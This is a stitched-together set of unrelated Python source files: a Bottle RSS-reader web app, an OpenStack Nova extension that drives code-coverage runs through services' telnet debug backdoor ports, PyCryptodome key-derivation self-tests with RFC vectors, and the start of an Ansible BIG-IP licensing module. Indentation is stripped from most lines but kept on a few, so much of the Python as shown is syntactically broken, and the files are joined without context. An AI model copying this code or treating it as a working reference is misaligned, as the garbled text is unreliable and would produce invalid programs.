#Item.update(new=False).where(Item.channel == channel).execute()
params = {}
for p in request.query.keys():
params[p] = request.query.getall(p)
params['page'] = page + 1
out['next'] = urlunsplit(('', '', request.fullpath, urlencode(params, doseq=True), ''))
params['page'] = page - 1 if page > 1 else 1
out['prev'] = urlunsplit(('', '', request.fullpath, urlencode(params, doseq=True), '')) if page > 1 else None
if request_accept_json():
return out
else:
return template('index', out, is_active=is_active, favicon=favicon, date_format=date_format, channels=channels)
@route('/items/<id:int>', method='GET')
def item(id:int) -> str:
try:
item = Item.get(Item.id == id)
except Item.DoesNotExist:
abort(404, 'Item does not exist')
if request.get_header('Accept') == 'application/json':
return {'item': item}
else:
return template('item', {'item': item})
@route('/items/<id:int>', method='PATCH')
def patch_item(id:int) -> str:
try:
item = Item.get(Item.id == id)
except Item.DoesNotExist:
abort(404)
valid_keys = ['read', 'starred']
for key in set(valid_keys).intersection(set(request.json.keys())):
setattr(item, key, request.json[key])
item.save()
return response.status
@route("/channels", method='GET')
def channels() -> str:
return {'channels': Channel.select()}
@route("/channels/<id:int>", method='GET')
def channel(id:int) -> str:
try:
channel = Channel.get(Channel.id == id)
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return {'channel': channel}
@route('/channels/<id:int>/delete', method='GET')
def delete_channel_confirm(id:int) -> str:
try:
channel = Channel.get(Channel.id == id)
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return template('delete', channel=channel)
@route('/channels/<id:int>', method='DELETE')
@route('/channels/<id:int>/delete', method='POST')
def delete_channel(id:int):
try:
channel = Channel.get(Channel.id == id)
Item.delete().where(Item.channel == channel).execute()
channel.delete_favicon()
Channel.delete().where(Channel.id == id).execute()
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
redirect(url('/'))
@route('/channels/create', method='GET')
def create_channel() -> str:
return template('create')
@route('/channels', method='POST')
def post_channel():
    feed_url = request.forms.get('url')
    Channel.create_from_url(feed_url)
    channel = Channel.get(Channel.url == feed_url)
    channel.save_favicon()
    channel.update_feed()
    redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/<id:int>/edit', method='GET')
def edit_channel(id:int) -> str:
channel = Channel.get(Channel.id == id)
return template('edit', channel=channel)
@route('/channels/<id:int>/edit', method='POST')
def edit_channel_post(id:int):
    title = request.forms.get('title')
    feed_url = request.forms.get('url')
    channel = Channel.get(Channel.id == id)
    channel.title = title
    channel.url = feed_url
    channel.save()
    redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/update', method='GET')
def update_channels():
for channel in Channel.select():
try:
channel.update_feed()
        except Exception:
continue
return redirect(url('/items'))
# possibly temporary route to update favicons for already established db's
@route('/channels/update-favicons', method='GET')
def update_channels_favicons():
    for c in Channel.select():
        try:
            c.save_favicon()
        except Exception:
            continue
return redirect(url('/items'))
@route('/channels/<id:int>/update', method='GET')
def update_channel(id: int):
try:
channel = Channel.get(Channel.id == id)
channel.update_feed()
except Channel.DoesNotExist:
abort(404, 'Channel does not exist')
return redirect(url('/channels/<id:int>/items', id=channel.id))
@route('/channels/import', method='GET')
def import_channels():
return template('import')
@route('/channels/import', method='POST')
def import_channels_post():
upload = request.files.get('file')
Channel.create_from_file(upload.file)
redirect(url('/items'))
@route('/static/<filename:path>')
def server_static(filename: str) -> Response:
return static_file(filename, root='static/')
@route('/favicon.ico')
def get_favicon() -> Response:
return server_static('favicon.ico')
if __name__ == '__main__':
try:
from mod_wsgi import version
    except ImportError:
run(host='0.0.0.0', port=3000, reloader=True, debug=True)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
# See: http://wiki.openstack.org/Nova/CoverageExtension for more information
# and usage explanation for this API extension
import os
import re
import socket
import sys
import telnetlib
import tempfile
from oslo.config import cfg
from webob import exc
from nova.api.openstack import extensions
from nova.cert import rpcapi as cert_api
from nova.compute import api as compute_api
from nova.conductor import api as conductor_api
from nova.console import api as console_api
from nova.consoleauth import rpcapi as consoleauth_api
from nova import db
from nova.network import api as network_api
from nova.openstack.common import log as logging
from nova.scheduler import rpcapi as scheduler_api
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'coverage_ext')
CONF = cfg.CONF
class CoverageController(object):
"""The Coverage report API controller for the OpenStack API."""
def __init__(self):
self.data_path = tempfile.mkdtemp(prefix='nova-coverage_')
self.compute_api = compute_api.API()
self.network_api = network_api.API()
self.conductor_api = conductor_api.API()
self.consoleauth_api = consoleauth_api.ConsoleAuthAPI()
self.console_api = console_api.API()
self.scheduler_api = scheduler_api.SchedulerAPI()
self.cert_api = cert_api.CertAPI()
self.services = []
self.combine = False
self._cover_inst = None
self.host = CONF.host
super(CoverageController, self).__init__()
@property
def coverInst(self):
if not self._cover_inst:
try:
import coverage
data_out = os.path.join(self.data_path, '.nova-coverage')
self._cover_inst = coverage.coverage(data_file=data_out)
except ImportError:
pass
return self._cover_inst
def _find_services(self, req):
"""Returns a list of services."""
context = req.environ['nova.context']
services = db.service_get_all(context)
hosts = []
for serv in services:
hosts.append({"service": serv["topic"], "host": serv["host"]})
return hosts
def _find_ports(self, req, hosts):
"""Return a list of backdoor ports for all services in the list."""
context = req.environ['nova.context']
apicommands = {
"compute": self.compute_api.get_backdoor_port,
"network": self.network_api.get_backdoor_port,
"conductor": self.conductor_api.get_backdoor_port,
"consoleauth": self.consoleauth_api.get_backdoor_port,
"console": self.console_api.get_backdoor_port,
"scheduler": self.scheduler_api.get_backdoor_port,
"cert": self.cert_api.get_backdoor_port,
}
ports = []
#TODO(mtreinish): Figure out how to bind the backdoor socket to 0.0.0.0
# Currently this will only work if the host is resolved as loopback on
# the same host as api-server
for host in hosts:
if host['service'] in apicommands:
get_port_fn = apicommands[host['service']]
_host = host
_host['port'] = get_port_fn(context, host['host'])
#NOTE(mtreinish): if the port is None then it wasn't set in
# the configuration file for this service. However, that
# doesn't necessarily mean that we don't have backdoor ports
# for all the services. So, skip the telnet connection for
# this service.
if _host['port']:
ports.append(_host)
else:
LOG.warning(_("Can't connect to service: %s, no port"
"specified\n"), host['service'])
else:
LOG.debug(_("No backdoor API command for service: %s\n"), host)
return ports
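    # The backdoor port is an interactive Python (telnet) shell exposed by
    # each service; the helpers below drive coverage remotely by writing small
    # Python snippets to it and waiting for the 'finished' marker.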
def _start_coverage_telnet(self, tn, service):
data_file = os.path.join(self.data_path,
'.nova-coverage.%s' % str(service))
tn.write('import sys\n')
tn.write('from coverage import coverage\n')
tn.write("coverInst = coverage(data_file='%s') "
"if 'coverInst' not in locals() "
"else coverInst\n" % data_file)
tn.write('coverInst.skipModules = sys.modules.keys()\n')
tn.write("coverInst.start()\n")
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
def _start_coverage(self, req, body):
'''Begin recording coverage information.'''
LOG.debug(_("Coverage begin"))
body = body['start']
self.combine = False
if 'combine' in body.keys():
self.combine = bool(body['combine'])
self.coverInst.skipModules = sys.modules.keys()
self.coverInst.start()
hosts = self._find_services(req)
ports = self._find_ports(req, hosts)
self.services = []
for service in ports:
try:
service['telnet'] = telnetlib.Telnet(service['host'],
service['port'])
# NOTE(mtreinish): Fallback to try connecting to lo if
# ECONNREFUSED is raised. If using the hostname that is returned
# for the service from the service_get_all() DB query raises
# ECONNREFUSED it most likely means that the hostname in the DB
# doesn't resolve to 127.0.0.1. Currently backdoors only open on
# loopback so this is for covering the common single host use case
except socket.error as e:
if 'ECONNREFUSED' in e and service['host'] == self.host:
service['telnet'] = telnetlib.Telnet('127.0.0.1',
service['port'])
else:
raise e
self.services.append(service)
self._start_coverage_telnet(service['telnet'], service['service'])
def _stop_coverage_telnet(self, tn):
tn.write("coverInst.stop()\n")
tn.write("coverInst.save()\n")
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
def _check_coverage(self):
try:
self.coverInst.stop()
self.coverInst.save()
except AssertionError:
return True
return False
def _stop_coverage(self, req):
for service in self.services:
self._stop_coverage_telnet(service['telnet'])
if self._check_coverage():
msg = _("Coverage not running")
raise exc.HTTPNotFound(explanation=msg)
return {'path': self.data_path}
def _report_coverage_telnet(self, tn, path, xml=False):
if xml:
execute = str("coverInst.xml_report(outfile='%s')\n" % path)
tn.write(execute)
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
else:
execute = str("output = open('%s', 'w')\n" % path)
tn.write(execute)
tn.write("coverInst.report(file=output)\n")
tn.write("output.close()\n")
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
tn.close()
def _report_coverage(self, req, body):
self._stop_coverage(req)
xml = False
html = False
path = None
body = body['report']
if 'file' in body.keys():
path = body['file']
if path != os.path.basename(path):
msg = _("Invalid path")
raise exc.HTTPBadRequest(explanation=msg)
path = os.path.join(self.data_path, path)
else:
msg = _("No path given for report file")
raise exc.HTTPBadRequest(explanation=msg)
if 'xml' in body.keys():
xml = body['xml']
elif 'html' in body.keys():
if not self.combine:
msg = _("You can't use html reports without combining")
raise exc.HTTPBadRequest(explanation=msg)
html = body['html']
if self.combine:
self.coverInst.combine()
if xml:
self.coverInst.xml_report(outfile=path)
elif html:
if os.path.isdir(path):
msg = _("Directory conflict: %s already exists")
raise exc.HTTPBadRequest(explanation=msg)
self.coverInst.html_report(directory=path)
else:
output = open(path, 'w')
self.coverInst.report(file=output)
output.close()
for service in self.services:
service['telnet'].close()
else:
if xml:
apipath = path + '.api'
self.coverInst.xml_report(outfile=apipath)
for service in self.services:
self._report_coverage_telnet(service['telnet'],
path + '.%s'
% service['service'],
xml=True)
else:
output = open(path + '.api', 'w')
self.coverInst.report(file=output)
for service in self.services:
self._report_coverage_telnet(service['telnet'],
path + '.%s' % service['service'])
output.close()
return {'path': path}
def action(self, req, body):
_actions = {
'start': self._start_coverage,
'stop': self._stop_coverage,
'report': self._report_coverage,
}
authorize(req.environ['nova.context'])
if not self.coverInst:
msg = _("Python coverage module is not installed.")
raise exc.HTTPServiceUnavailable(explanation=msg)
for action, data in body.iteritems():
if action == 'stop':
return _actions[action](req)
elif action == 'report' or action == 'start':
return _actions[action](req, body)
else:
msg = _("Coverage doesn't have %s action") % action
raise exc.HTTPBadRequest(explanation=msg)
raise exc.HTTPBadRequest(explanation=_("Invalid request body"))
class Coverage_ext(extensions.ExtensionDescriptor):
"""Enable Nova Coverage."""
name = "Coverage"
alias = "os-coverage"
namespace = ("http://docs.openstack.org/compute/ext/"
"coverage/api/v2")
updated = "2012-10-15T00:00:00+00:00"
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-coverage',
controller=CoverageController(),
collection_actions={"action": "POST"})
resources.append(res)
return resources
|
|
# -*- coding: utf-8 -*-
#
# SelfTest/Protocol/test_KDF.py: Self-test for key derivation functions
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
from binascii import unhexlify
from Cryptodome.Util.py3compat import *
from Cryptodome.SelfTest.st_common import list_test_cases
from Cryptodome.Hash import SHA1, HMAC, SHA256
from Cryptodome.Cipher import AES, DES3
from Cryptodome.Protocol.KDF import PBKDF1, PBKDF2, _S2V, HKDF, scrypt
def t2b(t):
if t is None:
return None
t2 = t.replace(" ", "").replace("\n", "")
return unhexlify(b(t2))
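# For example, t2b("41 42\n43") == unhexlify(b"414243") == b"ABC"; whitespace
# and newlines in the test vectors are stripped before decoding.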
class TestVector(object):
pass
class PBKDF1_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (8 bytes encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",16,1000,"DC19847E05C64D2FAF10EBFB4A3D2A20"),
)
def test1(self):
v = self._testData[0]
res = PBKDF1(v[0], t2b(v[1]), v[2], v[3], SHA1)
self.assertEqual(res, t2b(v[4]))
class PBKDF2_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",24,2048,"BFDE6BE94DF7E11DD409BCE20A0255EC327CB936FFE93643"),
# From RFC 6050
("password","73616c74", 20, 1, "0c60c80f961f0e71f3a9b524af6012062fe037a6"),
("password","73616c74", 20, 2, "ea6c014dc72d6f8ccd1ed92ace1d41f0d8de8957"),
("password","73616c74", 20, 4096, "4b007901b765489abead49d926f721d065a429c1"),
("passwordPASSWORDpassword","73616c7453414c5473616c7453414c5473616c7453414c5473616c7453414c5473616c74",
25, 4096, "3d2eec4fe41c849b80c8d83662c0e44a8b291a964cf2f07038"),
( 'pass\x00word',"7361006c74",16,4096, "56fa6aa75548099dcc37d7f03425e0c3"),
)
def test1(self):
# Test only for HMAC-SHA1 as PRF
def prf(p,s):
return HMAC.new(p,s,SHA1).digest()
for i in xrange(len(self._testData)):
v = self._testData[i]
res = PBKDF2(v[0], t2b(v[1]), v[2], v[3])
res2 = PBKDF2(v[0], t2b(v[1]), v[2], v[3], prf)
self.assertEqual(res, t2b(v[4]))
self.assertEqual(res, res2)
def test2(self):
"""From draft-josefsson-scrypt-kdf-01, Chapter 10"""
output_1 = t2b("""
55 ac 04 6e 56 e3 08 9f ec 16 91 c2 25 44 b6 05
f9 41 85 21 6d de 04 65 e6 8b 9d 57 c2 0d ac bc
49 ca 9c cc f1 79 b6 45 99 16 64 b3 9d 77 ef 31
7c 71 b8 45 b1 e3 0b d5 09 11 20 41 d3 a1 97 83
""")
output_2 = t2b("""
4d dc d8 f6 0b 98 be 21 83 0c ee 5e f2 27 01 f9
64 1a 44 18 d0 4c 04 14 ae ff 08 87 6b 34 ab 56
a1 d4 25 a1 22 58 33 54 9a db 84 1b 51 c9 b3 17
6a 27 2b de bb a1 d0 78 47 8f 62 b3 97 f3 3c 8d
""")
prf_hmac_sha256 = lambda p, s: HMAC.new(p, s, SHA256).digest()
output = PBKDF2(b("passwd"), b("salt"), 64, 1, prf=prf_hmac_sha256)
self.assertEqual(output, output_1)
output = PBKDF2(b("Password"), b("NaCl"), 64, 80000, prf=prf_hmac_sha256)
self.assertEqual(output, output_2)
class S2V_Tests(unittest.TestCase):
# Sequence of test vectors.
# Each test vector is made up by:
# Item #0: a tuple of strings
# Item #1: an AES key
# Item #2: the result
# Item #3: the cipher module S2V is based on
# Everything is hex encoded
_testData = [
# RFC5297, A.1
(
( '101112131415161718191a1b1c1d1e1f2021222324252627',
'112233445566778899aabbccddee' ),
'fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0',
'85632d07c6e8f37f950acd320a2ecc93',
AES
),
# RFC5297, A.2
(
( '00112233445566778899aabbccddeeffdeaddadadeaddadaffeeddcc'+
'bbaa99887766554433221100',
'102030405060708090a0',
'09f911029d74e35bd84156c5635688c0',
'7468697320697320736f6d6520706c61'+
'696e7465787420746f20656e63727970'+
'74207573696e67205349562d414553'),
'7f7e7d7c7b7a79787776757473727170',
'7bdb6e3b432667eb06f4d14bff2fbd0f',
AES
),
]
def test1(self):
"""Verify correctness of test vector"""
for tv in self._testData:
s2v = _S2V.new(t2b(tv[1]), tv[3])
for s in tv[0]:
s2v.update(t2b(s))
result = s2v.derive()
self.assertEqual(result, t2b(tv[2]))
def test2(self):
"""Verify that no more than 127(AES) and 63(TDES)
components are accepted."""
key = bchr(0) * 8 + bchr(255) * 8
for module in (AES, DES3):
s2v = _S2V.new(key, module)
max_comps = module.block_size*8-1
for i in xrange(max_comps):
s2v.update(b("XX"))
self.assertRaises(TypeError, s2v.update, b("YY"))
class HKDF_Tests(unittest.TestCase):
# Test vectors from RFC5869, Appendix A
# Each tuple is made up by:
# Item #0: hash module
# Item #1: secret
# Item #2: salt
# Item #3: context
# Item #4: expected result
_test_vector = (
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"3cb25f25faacd57a90434f64d0362f2a" +
"2d2d0a90cf1a5a4c5db02d56ecc4c5bf" +
"34007208d5b887185865"
),
(
SHA256,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"b11e398dc80327a1c8e7f78c596a4934" +
"4f012eda2d4efad8a050cc4c19afa97c" +
"59045a99cac7827271cb41c65e590e09" +
"da3275600c2f09b8367793a9aca3db71" +
"cc30c58179ec3e87c14c01d5c1f3434f" +
"1d87"
),
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
None,
None,
42,
"8da4e775a563c18f715f802a063c5a31" +
"b8a11f5c5ee1879ec3454e5f3c738d2d" +
"9d201395faa4b61a96c8"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"085a01ea1b10f36933068b56efa5ad81" +
"a4f14b822f5b091568a9cdd4f155fda2" +
"c22e422478d305f3f896"
),
(
SHA1,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"0bd770a74d1160f7c9f12cd5912a06eb" +
"ff6adcae899d92191fe4305673ba2ffe" +
"8fa3f1a4e5ad79f3f334b3b202b2173c" +
"486ea37ce3d397ed034c7f9dfeb15c5e" +
"927336d0441f4c4300e2cff0d0900b52" +
"d3b4"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"",
"",
42,
"0ac1af7002b3d761d1e55298da9d0506" +
"b9ae52057220a306e07b6b87e8df21d0" +
"ea00033de03984d34918"
),
(
SHA1,
"0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c",
None,
"",
42,
"2c91117204d745f3500d636a62f64f0a" +
"b3bae548aa53d423b0d1f27ebba6f5e5" +
"673a081d70cce7acfc48"
)
)
def test1(self):
for tv in self._test_vector:
secret, salt, info, exp = [ t2b(tv[x]) for x in (1,2,3,5) ]
key_len, hashmod = [ tv[x] for x in (4,0) ]
output = HKDF(secret, key_len, salt, hashmod, 1, info)
self.assertEqual(output, exp)
def test2(self):
ref = HKDF(b("XXXXXX"), 12, b("YYYY"), SHA1)
# Same output, but this time split over 2 keys
key1, key2 = HKDF(b("XXXXXX"), 6, b("YYYY"), SHA1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = HKDF(b("XXXXXX"), 4, b("YYYY"), SHA1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
class scrypt_Tests(unittest.TestCase):
# Test vectors taken from
# http://tools.ietf.org/html/draft-josefsson-scrypt-kdf-00
data = (
(
"",
"",
16, # 2K
1,
1,
"""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
"""
),
(
"password",
"NaCl",
1024, # 1M
8,
16,
"""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
"""
),
(
"pleaseletmein",
"SodiumChloride",
16384, # 16M
8,
1,
"""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
"""
),
(
"pleaseletmein",
"SodiumChloride",
1048576, # 1G
8,
1,
"""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
"""
),
)
def setUp(self):
new_test_vectors = []
for tv in self.data:
new_tv = TestVector()
new_tv.P = b(tv[0])
new_tv.S = b(tv[1])
new_tv.N = tv[2]
new_tv.r = tv[3]
new_tv.p = tv[4]
new_tv.output = t2b(tv[5])
new_tv.dkLen = len(new_tv.output)
new_test_vectors.append(new_tv)
self.data = new_test_vectors
def _test1(self):
b_input = t2b("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
""")
b_output = t2b("""
79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
""")
from Cryptodome.Protocol.KDF import _scryptROMix
output = _scryptROMix(b_input, 16)
self.assertEqual(output, b_output)
def test2(self):
for tv in self.data:
# TODO: add runtime flag to enable test vectors
# with humongous memory usage
if tv.N > 100000:
continue
output = scrypt(tv.P, tv.S, tv.dkLen, tv.N, tv.r, tv.p)
self.assertEqual(output, tv.output)
def test3(self):
ref = scrypt(b("password"), b("salt"), 12, 16, 1, 1)
# Same output, but this time split over 2 keys
key1, key2 = scrypt(b("password"), b("salt"), 6, 16, 1, 1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = scrypt(b("password"), b("salt"), 4, 16, 1, 1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
def get_tests(config={}):
tests = []
tests += list_test_cases(PBKDF1_Tests)
tests += list_test_cases(PBKDF2_Tests)
tests += list_test_cases(S2V_Tests)
tests += list_test_cases(HKDF_Tests)
tests += list_test_cases(scrypt_Tests)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: bigip_license
short_description: Manage license installation and activation on BIG-IP devices
description:
- Manage license installation and activation on BIG-IP devices
version_added: "2.2"
options:
dossier_file:
description:
- Path to file containing kernel dossier for your system
required: false
server:
description:
- BIG-IP host to connect to
required: true
key:
description:
- The registration key to use to license the BIG-IP. This is required
if the C(state) is equal to C(present) or C(latest)
required: false
license_file:
description:
- Path to file containing the license to use
required: false
license_options:
description:
- Dictionary of options to use when creating the license
required: false
password:
description:
- The password of the user used to authenticate to the BIG-IP
required: true
state:
description:
- The state of the license on the system. When C(present), only guarantees
that a license is there. When C(latest), ensures that the license is always
valid. When C(absent), removes the license from the system. C(latest) is
most useful internally. When using C(absent), the account accessing the
device must be configured to use the advanced shell instead of Appliance
Mode.
required: false
default: present
choices:
- absent
- latest
- present
wsdl:
description:
- WSDL file to use if you're receiving errors when downloading the WSDL
file at run-time from the licensing servers
required: false
default: None
user:
description:
- The username used when connecting to the BIG-IP
required: true
aliases:
- username
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
used on personally controlled sites using self-signed certificates.
required: false
default: true
notes:
- Requires the suds Python package on the host. This is as easy as
pip install suds
- Requires the bigsuds Python package on the host. This is as easy as
pip install bigsuds
- Requires the paramiko Python package on the host if using the C(state)
C(absent). This is as easy as pip install paramiko
- Requires the requests Python package on the host if using the C(state)
C(absent). This is as easy as pip install requests
requirements:
- bigsuds
- requests
- suds
- paramiko
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = '''
- name: License BIG-IP using default license options
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
delegate_to: localhost
- name: License BIG-IP, specifying license options
bigip_license:
server: "big-ip.domain.org"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
username: "admin"
password: "MyPassword123"
license_options:
email: '[email protected]'
firstname: 'Joe'
lastname: 'User'
company: 'My Place'
phone: '630-555-1212'
jobtitle: 'Systems Administrator'
address: '207 N Rodeo Dr'
city: 'Beverly Hills'
state: 'CA'
postalcode: '90210'
country: 'US'
delegate_to: localhost
- name: Remove the license from the system
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
state: "absent"
delegate_to: localhost
- name: Update the current license of the BIG-IP
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
state: "latest"
delegate_to: localhost
'''
import base64
import json
import re
import socket
import ssl
import time
import requests
import suds
from xml.sax._exceptions import SAXParseException
try:
    import paramiko
except ImportError:
    paramiko_found = False
else:
    paramiko_found = True
try:
    import bigsuds
except ImportError:
    bigsuds_found = False
else:
    bigsuds_found = True
LIC_EXTERNAL = 'activate.f5.com'
LIC_INTERNAL = 'authem.f5net.com'
def is_production_key(key):
m = re.search(r"\d", key[1:-1])
if m:
return False
else:
return True
class UnreachableActivationServerError(Exception):
pass
class DossierNotGeneratedError(Exception):
pass
class NoLicenseReturnedError(Exception):
pass
class SSLCertVerifyError(Exception):
pass
class UnprivilegedAccountError(Exception):
pass
class BigIpLicenseCommon(object):
def __init__(self, module):
self.password = module.params.get('password')
self.username = module.params.get('user')
self.hostname = module.params.get('server')
# Holds the SSH connection for paramiko when ensuring the license is absent
